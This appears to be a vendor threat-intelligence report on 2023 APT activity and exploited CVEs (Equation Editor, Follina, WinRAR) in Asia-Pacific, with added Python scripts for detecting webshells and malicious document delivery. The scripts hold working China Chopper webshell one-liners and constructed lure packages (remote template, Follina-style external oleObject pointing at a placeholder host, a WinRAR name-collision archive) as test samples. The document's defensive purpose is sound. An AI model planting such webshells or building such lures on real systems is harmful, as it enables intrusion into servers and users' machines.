Executive Summary
The Asia-Pacific region remains a hotbed for cyber threats, with a marked increase in sophisticated attacks targeting critical sectors such as government, IT, and healthcare. This report delves into the latest vulnerabilities, exploits, and Advanced Persistent Threat (APT) groups that are actively operating in the region. Notably, Taiwan, Japan, and South Korea are among the most targeted countries, with Chinese and North Korean APT groups leading the charge. The report also highlights the exploitation of specific vulnerabilities and provides actionable mitigation strategies to safeguard against these threats.
Technical Information
In 2023, at least 37 Common Vulnerabilities and Exposures (CVEs) were actively exploited by threat actors against targets in the Asia-Pacific region. CVE-2018-0798 stands out: a memory corruption flaw in the Microsoft Office Equation Editor component (EQNEDT32.EXE) that gives remote code execution when a crafted document is opened, delivered through spear phishing emails that use remote template injection and macro documents. Although it dates from 2018 it is still widely exploited, and it is listed in CISA's Known Exploited Vulnerabilities catalog. CVE-2022-30190 ("Follina") is a remote code execution flaw in the Microsoft Support Diagnostic Tool (MSDT): a document that loads an external HTML object can invoke the ms-msdt: URL handler and run commands without the user enabling macros. CVE-2023-38831 is a flaw in WinRAR versions before 6.23 in which opening a benign-looking file inside a crafted archive also executes a script placed in a folder of the same name; it has been used in a range of campaigns, underscoring how quickly attackers adopt bugs in everyday user software.
The threat landscape is further complicated by the increasing use of shared tools and open-source software by threat actors, which hampers attribution. Webshells, particularly Godzilla and China Chopper, are frequently deployed by Chinese APT groups on compromised web servers and edge appliances: they are small, ride on ordinary HTTP traffic and give the operator persistent access that is hard to distinguish from legitimate requests. Cross-platform Remote Access Trojans (RATs) are also gaining traction, with builds for Windows, Linux, macOS and mobile platforms.
APT groups such as Huapi, Amoeba, Polaris, and the newly active SLIME13 have been particularly aggressive in targeting Taiwan, focusing on sectors like government, IT, and healthcare. In Northeast Asia, Japan and South Korea face persistent threats from Chinese and North Korean actors, with government and cryptocurrency sectors being primary targets. South and Southeast Asia are not spared either, with Chinese groups like Polaris and Amoeba, as well as Vietnamese groups like OceanLotus, actively exploiting geopolitical tensions to launch cyber attacks.
Exploitation in the Wild
APT groups are leveraging vulnerabilities in widely deployed edge appliances such as Barracuda, Fortinet FortiGate, Citrix and Array Networks VPN products. These devices sit outside the reach of endpoint agents and often receive little security monitoring, so intrusions through them are stealthy and persistent and frequently go undetected for extended periods. Indicators of Compromise (IOCs) include unusual network traffic patterns originating from the appliance, unauthorized access attempts, and the presence of known malicious webshells.
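As an added example (not code from the original report), the script below hunts for the webshell indicator named above in two places: the server-side file contents, where a China Chopper style shell is a single "evaluate the request parameter" statement, and the access log, where an operator driving such a shell produces POST-only traffic with no Referer from one or two addresses. The file contents, paths, log lines and IP addresses are constructed here for illustration.

```python
"""Hunt for China Chopper style one-line webshells in a web root and for the
request pattern they leave in access logs. Added example, not from the
original report; the file contents and log lines are constructed here."""
import re
from collections import defaultdict

# The server side of China Chopper and similar shells is a single statement:
# evaluate whatever arrives in a request parameter.
WEBSHELL_PATTERNS = {
    "php-eval-request": re.compile(
        r'\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST)\s*\[', re.I),
    "aspx-eval-request": re.compile(
        r'\beval\s*\(\s*Request\.(Item|Form|QueryString)\s*\[[^\]]*\]\s*,\s*"unsafe"', re.I),
    "jsp-exec-request": re.compile(
        r'Runtime\.getRuntime\(\)\.exec\s*\([^)]*request\.getParameter', re.I),
}


def scan_source(name: str, text: str) -> list:
    """Return (file, pattern) pairs for every webshell signature that fires."""
    return [(name, tag) for tag, rx in WEBSHELL_PATTERNS.items() if rx.search(text)]


# Apache/nginx combined log format: ip ident user [time] "req" status size "ref" "ua"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"')
SCRIPT_EXT = (".php", ".asp", ".aspx", ".jsp", ".jspx")


def suspicious_script_paths(lines, min_posts: int = 3) -> list:
    """Script paths that only ever receive POSTs, never carry a Referer and are
    hit from at most two clients: how an operator drives a one-line shell, and
    the opposite of how a browser reaches a real form handler."""
    stats = defaultdict(lambda: {"post": 0, "other": 0, "referer": 0, "ips": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, _status, referer = m.groups()
        path = path.split("?", 1)[0]
        if not path.lower().endswith(SCRIPT_EXT):
            continue
        s = stats[path]
        s["post" if method.upper() == "POST" else "other"] += 1
        if referer != "-":
            s["referer"] += 1
        s["ips"].add(ip)
    return sorted(p for p, s in stats.items()
                  if s["post"] >= min_posts and s["other"] == 0
                  and s["referer"] == 0 and len(s["ips"]) <= 2)


# Constructed file contents (hypothetical paths).
CHOPPER_PHP = "<?php @eval($_POST['pass']); ?>"
CHOPPER_ASPX = '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'
BENIGN_PHP = "<?php echo htmlspecialchars($_POST['name'] ?? ''); ?>"

# Constructed access log: an operator driving a dropped shell next to normal
# traffic to a legitimate form handler. Addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Oct/2023:10:00:01 +0800] "POST /images/cache.aspx HTTP/1.1" 200 42 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [12/Oct/2023:10:00:07 +0800] "POST /images/cache.aspx HTTP/1.1" 200 318 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [12/Oct/2023:10:01:12 +0800] "POST /images/cache.aspx HTTP/1.1" 200 4096 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [12/Oct/2023:10:01:30 +0800] "GET /login.php HTTP/1.1" 200 1532 "https://www.example.invalid/" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Oct/2023:10:01:41 +0800] "POST /login.php HTTP/1.1" 302 0 "https://www.example.invalid/login.php" "Mozilla/5.0"',
    '198.51.100.8 - - [12/Oct/2023:10:02:00 +0800] "POST /login.php HTTP/1.1" 302 0 "https://www.example.invalid/login.php" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for name, text in [("uploads/x.php", CHOPPER_PHP), ("aspnet_client/s.aspx", CHOPPER_ASPX),
                       ("app/index.php", BENIGN_PHP)]:
        print(name, scan_source(name, text))
    print("post-only script paths:", suspicious_script_paths(SAMPLE_LOG))
```

The content signatures are deliberately narrow (a literal eval of a request parameter) so they seldom fire on application code; obfuscated or encrypted shells such as Godzilla will not match them, which is why the log heuristic is run alongside: it keys on the operator's behaviour rather than on the shell's bytes. Tune min_posts to the site's traffic and review hits against the file's creation time on disk.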
APT Groups using these vulnerabilities
Chinese APT groups are at the forefront of exploiting these vulnerabilities, known for their sophisticated operations and use of shared tools. They target a wide range of sectors, including IT and critical infrastructure. North Korean actors are also active, focusing on geopolitical intelligence and financial gain, often targeting cryptocurrency sectors. Vietnamese APT groups, such as OceanLotus, are active both domestically and internationally, with a focus on neighboring countries.
Affected Product Versions
The vulnerabilities discussed affect a range of products and versions. CVE-2018-0798 affects Microsoft Office 2007 through Office 2016 installations that have not applied the January 2018 security update, which removed the vulnerable Equation Editor component. CVE-2022-30190 affects all Windows versions that shipped MSDT until the June 2022 security updates. CVE-2023-38831 affects WinRAR versions before 6.23.
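The delivery techniques described in the Technical Information and Affected Product Versions sections can be checked for offline, before a document or archive reaches a user. The script below is an added example, not code from the original report: it opens an Office package (a ZIP of XML parts) and flags relationships that fetch a remote template (the template injection used to deliver CVE-2018-0798 exploits) or a remote oleObject (the loader used by CVE-2022-30190 lures) as well as the ms-msdt: scheme itself, and it flags the file/directory name collision that CVE-2023-38831 relies on in ZIP archives. The sample packages, hostnames and file names are constructed in memory and are not observed indicators.

```python
"""Offline triage for the delivery patterns tied to the CVEs above:
remote template injection in Office packages, the external oleObject link
and ms-msdt: scheme used by CVE-2022-30190, and the file/directory name
collision abused by CVE-2023-38831. Added example, not from the original
report; all sample packages are constructed in memory below."""
import io
import re
import zipfile

# A relationship that points outside the package. Producers order the
# attributes differently, so match the element first, then read attributes.
EXTERNAL_REL = re.compile(r'<Relationship\b[^>]*\bTargetMode="External"[^>]*>', re.I)
REMOTE_PREFIXES = ("http://", "https://", "file://", "\\\\")


def _attr(rel: str, key: str) -> str:
    m = re.search(r'\b%s="([^"]*)"' % key, rel, re.I)
    return m.group(1) if m else ""


def scan_ooxml(data: bytes) -> list:
    """Return (tag, part, target) findings for a .docx/.xlsx/.pptx package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for part in zf.namelist():
            raw = zf.read(part)
            # CVE-2022-30190 chains end in an ms-msdt: URL; usually it sits in
            # the fetched HTML, but some lures carry it inside the package.
            if b"ms-msdt:" in raw.lower():
                findings.append(("ms-msdt-scheme", part, ""))
            if not part.endswith(".rels"):
                continue
            for rel in EXTERNAL_REL.findall(raw.decode("utf-8", "replace")):
                target = _attr(rel, "Target")
                rtype = _attr(rel, "Type").rsplit("/", 1)[-1]
                if not target.lower().startswith(REMOTE_PREFIXES):
                    continue
                if rtype == "attachedTemplate":      # remote template injection
                    findings.append(("remote-template", part, target))
                elif rtype == "oleObject":           # Follina-style loader
                    findings.append(("remote-oleobject", part, target))
    return findings


def scan_name_collision(data: bytes) -> list:
    """CVE-2023-38831 pattern: one name used both for a file and for a
    directory (typically "decoy.pdf " with a trailing space), the directory
    holding the script WinRAR actually runs. Returns (decoy, [payloads])."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
    files = {n for n in names if not n.endswith("/")}
    dirs = {n.rstrip("/") for n in names if n.endswith("/")}
    for n in files:                       # directories implied by nested entries
        while "/" in n:
            n = n.rsplit("/", 1)[0]
            dirs.add(n)
    return [(f, sorted(c for c in files if c.startswith(f + "/")))
            for f in sorted(files) if f in dirs]


def _package(entries) -> bytes:
    """Build a ZIP/OOXML package in memory from (name, body) pairs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in entries:
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed samples. Hostnames are placeholders, not observed indicators.
REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
TEMPLATE_INJECTION_DOCX = _package([
    ("word/document.xml", "<w:document/>"),
    ("word/_rels/settings.xml.rels",
     '<Relationships><Relationship Id="rId1" Type="%sattachedTemplate" '
     'Target="http://template.invalid/t.dotm" TargetMode="External"/></Relationships>' % REL_NS),
])
FOLLINA_DOCX = _package([
    ("word/document.xml", "<w:document/>"),
    ("word/_rels/document.xml.rels",
     '<Relationships><Relationship Id="rId9" TargetMode="External" Type="%soleObject" '
     'Target="http://lure.invalid/index.html!"/></Relationships>' % REL_NS),
])
CLEAN_DOCX = _package([
    ("word/document.xml", "<w:document/>"),
    ("word/_rels/document.xml.rels",
     '<Relationships><Relationship Id="rId1" Type="%sstyles" Target="styles.xml"/></Relationships>' % REL_NS),
])
COLLISION_ZIP = _package([
    ("report.pdf ", b"%PDF-1.4 decoy"),
    ("report.pdf /report.pdf .cmd", b"start calc.exe"),
])

if __name__ == "__main__":
    for label, blob in [("template", TEMPLATE_INJECTION_DOCX), ("follina", FOLLINA_DOCX),
                        ("clean", CLEAN_DOCX)]:
        print(label, scan_ooxml(blob))
    print("collision", scan_name_collision(COLLISION_ZIP))
```

Relationship parts are matched with a regular expression rather than an XML parser on purpose: malformed XML that Word still tolerates is itself a common evasion, and a strict parser would drop the sample instead of flagging it. Any external relationship at all is worth a second look; the two tags above are the ones tied to the CVEs in this report.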
Workaround and Mitigation
Organizations in the Asia-Pacific region should prioritize threat intelligence that covers the groups and tooling above so that they can anticipate campaigns rather than react to them. Patching the known exploited vulnerabilities is the single most effective step: for CVE-2018-0798, apply current Office updates (the January 2018 update removed the vulnerable Equation Editor component) and keep Microsoft's default block on macros in files downloaded from the internet; for CVE-2022-30190, apply the June 2022 Windows updates or, as Microsoft's interim workaround, remove the ms-msdt: protocol handler key from the registry; for CVE-2023-38831, update WinRAR to 6.23 or later. Internet-facing edge devices (email gateways, VPN and application-delivery appliances) deserve the same attention as servers: forward their logs to the SIEM, watch for new or modified web content and unexpected outbound connections, and check vendor advisories on a fixed schedule, since these devices typically cannot run an EDR agent. Web servers should be reviewed for newly written script files and for script paths that receive only POST traffic. Endpoint protection with behavioral detection and regular security audits round out the program.
References
For further reading and detailed threat intelligence, please refer to the following sources: TeamT5: APT Threat Landscape in APAC 2023 (https://www.teamt5.org), Cyberint: Top Asian/APAC Cybersecurity Threats of 2023 (https://www.cyberint.com), and DarkReading: China-Backed APT Group Culling Thai Government Data (https://www.darkreading.com).
Rescana is here for you
At Rescana, we are committed to helping our customers navigate the complex cybersecurity landscape with our Continuous Threat and Exposure Management (CTEM) platform. Our solutions are designed to provide comprehensive threat intelligence and proactive defense strategies. Should you have any questions about this report or any other cybersecurity concerns, please do not hesitate to contact us at ops@rescana.com. We are here to support you in safeguarding your organization against evolving cyber threats.